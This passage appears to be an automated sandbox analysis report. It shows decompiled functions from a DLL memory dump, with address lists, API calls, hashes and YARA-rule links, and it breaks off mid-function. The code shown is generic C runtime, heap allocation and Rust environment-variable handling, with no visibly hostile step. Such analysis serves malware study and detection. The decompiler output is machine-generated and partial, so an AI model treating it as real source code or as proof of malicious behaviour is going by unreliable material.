                          0x6e4c1b22
                          0x6e4c1b23
                          0x6e4c1b23
                          0x6e4c1b34
                          0x6e4c1b3a
                          0x6e4c1afa
                          0x6e4c1afa
                          0x6e4c1b01
                          0x6e4c1b07
                          0x6e4c1b07
                          0x6e4c1ae0
                          0x6e4c1ae1
                          0x6e4c1ae7
                          0x6e4c1ae7
                          0x6e4c1b3d
                          0x6e4c1b40

                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6E4C1AA9
                            • Part of subcall function 6E4C19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E4C3B22,?,00000000,-00000008), ref: 6E4C1A5F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4C1AE1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4C1B01
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 67f97c1b6cd482b69a5ee7b4a6d53dbe87dcf643e51da27ddc11235580cb6d68
                          • Instruction ID: 549ece053d266ebb910f594ce7c18b1a92997b982a19b7f1bfc52da73f2664d1
                          • Opcode Fuzzy Hash: 67f97c1b6cd482b69a5ee7b4a6d53dbe87dcf643e51da27ddc11235580cb6d68
                          • Instruction Fuzzy Hash: F611E1ED5055197F6B0167F65C8DCAF69BCDE4AA98300082BF50593301FE60EE0585F2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E6E4BA114(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, void* __fp0) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;
				void* _t140;

				_t140 = __fp0;
				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6E4BAC90(__ebx, __edi, __esi);
				_t43 = E6E4BA96D(__ecx, __edx, 0); // executed
				_t90 = 0x6e4f7d60;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6E4BA872();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6e4fb158;
					if( *0x6e4fb158 != 0) {
						E6E4BAB0C(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6e4f7d80);
						E6E4BAC90(1, __edi, __esi);
						_t48 =  *0x6e4fae14; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e4fae14 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6E4BA872();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6e4fb158 - 2;
							if( *0x6e4fb158 != 2) {
								E6E4BAB0C(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6e4f7da8);
								E6E4BAC90(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6E4BA3D6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6E4BA0C1(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_t56 = E6E4A1290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_t59 = E6E4A1290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t56, _t86);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6E4BA3D6( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6E4BA0C1(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6E4BA3D6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6e4fae14 - _t110; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6E4BA93D(1, _t90, 1, _t113);
								E6E4BA7F9();
								E6E4BAC5B();
								 *0x6e4fb158 =  *0x6e4fb158 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6E4BA2B0();
								_t67 = E6E4BAADE(_t90,  *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6E4BA2BD();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6e4fb158 = 1;
						if(E6E4BA8CF(_t132) != 0) {
							E6E4BA7ED(E6E4BAC2F());
							E6E4BA811();
							_t80 = E6E4BE791(0x6e4c817c, 0x6e4c818c); // executed
							_pop(_t102);
							if(_t80 == 0 && E6E4BA8A4(1, _t102) != 0) {
								E6E4BE766(0x6e4c8158, 0x6e4c8178); // executed
								 *0x6e4fb158 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6E4BA1F7();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6E4BAB06();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6E4BAA2D(_t85, _t106, _t121, _t138) != 0) {
									 *0x6e4c8154( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6e4fae14 =  *0x6e4fae14 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}






















                          0x6e4ba114
                          0x6e4ba114
                          0x6e4ba114
                          0x6e4ba114
                          0x6e4ba114
                          0x6e4ba11b
                          0x6e4ba122
                          0x6e4ba127
                          0x6e4ba12a
                          0x6e4ba201
                          0x6e4ba201
                          0x6e4ba201
                          0x00000000
                          0x6e4ba130
                          0x6e4ba135
                          0x6e4ba138
                          0x6e4ba13a
                          0x6e4ba13d
                          0x6e4ba141
                          0x6e4ba148
                          0x6e4ba215
                          0x6e4ba21a
                          0x6e4ba21b
                          0x6e4ba21d
                          0x6e4ba222
                          0x6e4ba227
                          0x6e4ba22c
                          0x6e4ba22e
                          0x6e4ba235
                          0x6e4ba23d
                          0x6e4ba240
                          0x6e4ba249
                          0x6e4ba24c
                          0x6e4ba24f
                          0x6e4ba256
                          0x6e4ba2c5
                          0x6e4ba2ca
                          0x6e4ba2cb
                          0x6e4ba2cd
                          0x6e4ba2d2
                          0x6e4ba2d7
                          0x6e4ba2da
                          0x6e4ba2dc
                          0x6e4ba2ed
                          0x6e4ba2ed
                          0x6e4ba2f1
                          0x6e4ba2f4
                          0x6e4ba300
                          0x6e4ba300
                          0x6e4ba30d
                          0x6e4ba30f
                          0x6e4ba312
                          0x6e4ba314
                          0x6e4ba31f
                          0x6e4ba324
                          0x6e4ba326
                          0x6e4ba329
                          0x6e4ba32b
                          0x00000000
                          0x00000000
                          0x6e4ba32b
                          0x6e4ba2f6
                          0x6e4ba2f6
                          0x6e4ba2f9
                          0x00000000
                          0x6e4ba2fb
                          0x6e4ba2fb
                          0x6e4ba331
                          0x6e4ba336
                          0x6e4ba33b
                          0x6e4ba33d
                          0x6e4ba340
                          0x6e4ba343
                          0x6e4ba345
                          0x6e4ba347
                          0x6e4ba34e
                          0x6e4ba353
                          0x6e4ba355
                          0x6e4ba355
                          0x6e4ba35b
                          0x6e4ba35c
                          0x6e4ba361
                          0x6e4ba367
                          0x6e4ba367
                          0x6e4ba347
                          0x6e4ba36c
                          0x6e4ba36e
                          0x6e4ba375
                          0x6e4ba37f
                          0x6e4ba381
                          0x6e4ba384
                          0x6e4ba386
                          0x6e4ba392
                          0x6e4ba3ba
                          0x6e4ba3ba
                          0x6e4ba370
                          0x6e4ba370
                          0x6e4ba373
                          0x00000000
                          0x00000000
                          0x6e4ba373
                          0x6e4ba36e
                          0x6e4ba2f9
                          0x6e4ba3bd
                          0x6e4ba3c4
                          0x6e4ba2de
                          0x6e4ba2de
                          0x6e4ba2e4
                          0x00000000
                          0x6e4ba2e6
                          0x6e4ba2e6
                          0x6e4ba2e6
                          0x6e4ba2e4
                          0x6e4ba3c9
                          0x6e4ba3d5
                          0x6e4ba258
                          0x6e4ba258
                          0x6e4ba25d
                          0x6e4ba262
                          0x6e4ba267
                          0x6e4ba26e
                          0x6e4ba272
                          0x6e4ba27c
                          0x6e4ba288
                          0x6e4ba28a
                          0x6e4ba28a
                          0x6e4ba28c
                          0x6e4ba28f
                          0x6e4ba296
                          0x6e4ba29b
                          0x00000000
                          0x6e4ba29b
                          0x6e4ba230
                          0x6e4ba230
                          0x6e4ba29d
                          0x6e4ba2a0
                          0x6e4ba2ac
                          0x6e4ba2ac
                          0x6e4ba14e
                          0x6e4ba14e
                          0x6e4ba15f
                          0x6e4ba166
                          0x6e4ba16b
                          0x6e4ba17a
                          0x6e4ba180
                          0x6e4ba183
                          0x6e4ba198
                          0x6e4ba19f
                          0x6e4ba1a9
                          0x6e4ba1ab
                          0x6e4ba1ab
                          0x6e4ba183
                          0x6e4ba1ae
                          0x6e4ba1b5
                          0x6e4ba1bc
                          0x00000000
                          0x6e4ba1be
                          0x6e4ba1c3
                          0x6e4ba1c5
                          0x6e4ba1c8
                          0x6e4ba1ca
                          0x6e4ba1d3
                          0x6e4ba1e1
                          0x6e4ba1e7
                          0x6e4ba1e7
                          0x6e4ba1d3
                          0x6e4ba1e9
                          0x6e4ba1f1
                          0x6e4ba1f1
                          0x6e4ba203
                          0x6e4ba206
                          0x6e4ba212
                          0x6e4ba212
                          0x6e4ba148

                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6E4BA161
                            • Part of subcall function 6E4BA7ED: InitializeSListHead.KERNEL32(6E4FB140,6E4BA16B,6E4F7D60,00000010,6E4BA0FC,?,?,?,6E4BA324,?,00000001,?,?,00000001,?,6E4F7DA8), ref: 6E4BA7F2
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E4BA1CB
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: c3afb07ce63a7397ad32a3b544d1d84fe39e20a85a1601e566d7b59a477a88b3
                          • Instruction ID: c6b11454c1c39999187c31dfafdf0f7145ec00d1d6bb9d34dffe111ff328b62b
                          • Opcode Fuzzy Hash: c3afb07ce63a7397ad32a3b544d1d84fe39e20a85a1601e566d7b59a477a88b3
                          • Instruction Fuzzy Hash: 8D2102319886859ADF90ABF4A904FDC37A59F06A6CF104C0FC4652B3C1DB722056F6F2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C0566, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4C0566(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e4fb5d8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E4C2E1C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E4BF90F())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E4BE7CE(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                          0x6e4c056c
                          0x6e4c0571
                          0x6e4c057f
                          0x6e4c057f
                          0x6e4c0585
                          0x6e4c0587
                          0x6e4c0587
                          0x6e4c059e
                          0x6e4c05a7
                          0x6e4c05af
                          0x00000000
                          0x00000000
                          0x6e4c058f
                          0x6e4c0591
                          0x6e4c05b3
                          0x6e4c05b8
                          0x6e4c05be
                          0x00000000
                          0x6e4c05be
                          0x6e4c0594
                          0x6e4c059a
                          0x6e4c059c
                          0x00000000
                          0x00000000
                          0x6e4c059c
                          0x00000000
                          0x6e4c059e
                          0x6e4c0577
                          0x6e4c057d
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,6E4C017F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6E4BA44C,?,?,6E4B99B4), ref: 6E4C05A7
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: dba67610318b6d20007ec1076387bcbd8581d809d2681b7856f399cfafe914b9
                          • Instruction ID: 2bb7800b8ee7c6972150d76d3eb888c4ef3593a1ad2b6b0612484de37323accd
                          • Opcode Fuzzy Hash: dba67610318b6d20007ec1076387bcbd8581d809d2681b7856f399cfafe914b9
                          • Instruction Fuzzy Hash: 81F0B479649625A7EB519AF69C14E8A37489B46F64B014123EC14A7284EB70E90186E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BFC29, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4BFC29(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E4BF90F())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e4fb5d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E4C2E1C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6E4BE7CE(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                          0x6e4bfc2f
                          0x6e4bfc35
                          0x6e4bfc67
                          0x6e4bfc6c
                          0x6e4bfc72
                          0x00000000
                          0x6e4bfc72
                          0x6e4bfc39
                          0x6e4bfc3b
                          0x6e4bfc3b
                          0x6e4bfc52
                          0x6e4bfc5b
                          0x6e4bfc63
                          0x00000000
                          0x00000000
                          0x6e4bfc43
                          0x6e4bfc45
                          0x00000000
                          0x00000000
                          0x6e4bfc48
                          0x6e4bfc4e
                          0x6e4bfc50
                          0x00000000
                          0x00000000
                          0x6e4bfc50
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,6E4BA44C,?,?,6E4B99B4,00000400,FFFDD001,?,?,?), ref: 6E4BFC5B
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: dd1b61fab0136fa5eb047a8e55cec9828adfd65813b818ab26a07c43b7cbbab8
                          • Instruction ID: d7a7211e0f64db24823837ec6f98bc8ff4e26b2fe2541439bcb027dc1d6a6e67
                          • Opcode Fuzzy Hash: dd1b61fab0136fa5eb047a8e55cec9828adfd65813b818ab26a07c43b7cbbab8
                          • Instruction Fuzzy Hash: 5AE0E53914B6156BEA502AF65C04F96366CBF427A4F310523EC9CA7784CF70D48142F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 6E4AD530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6E4AD530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6E4B3B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6e4fadc8; // 0xb00000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6E4C7370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6e4ed2be;
							if(_t264 != 0x6e4ed2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6e4ed2be;
									if(_t229 == 0x6e4ed2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6e4ed2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6e4ed2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6e4ed2be;
											if(_t264 == 0x6e4ed2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6e4ed2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6e4ed2be;
												if(_t273 == 0x6e4ed2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6e4ed2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6E4C7370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6E4BC310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6e4ed0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6E4C7370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6E4B0EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6e4fadc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
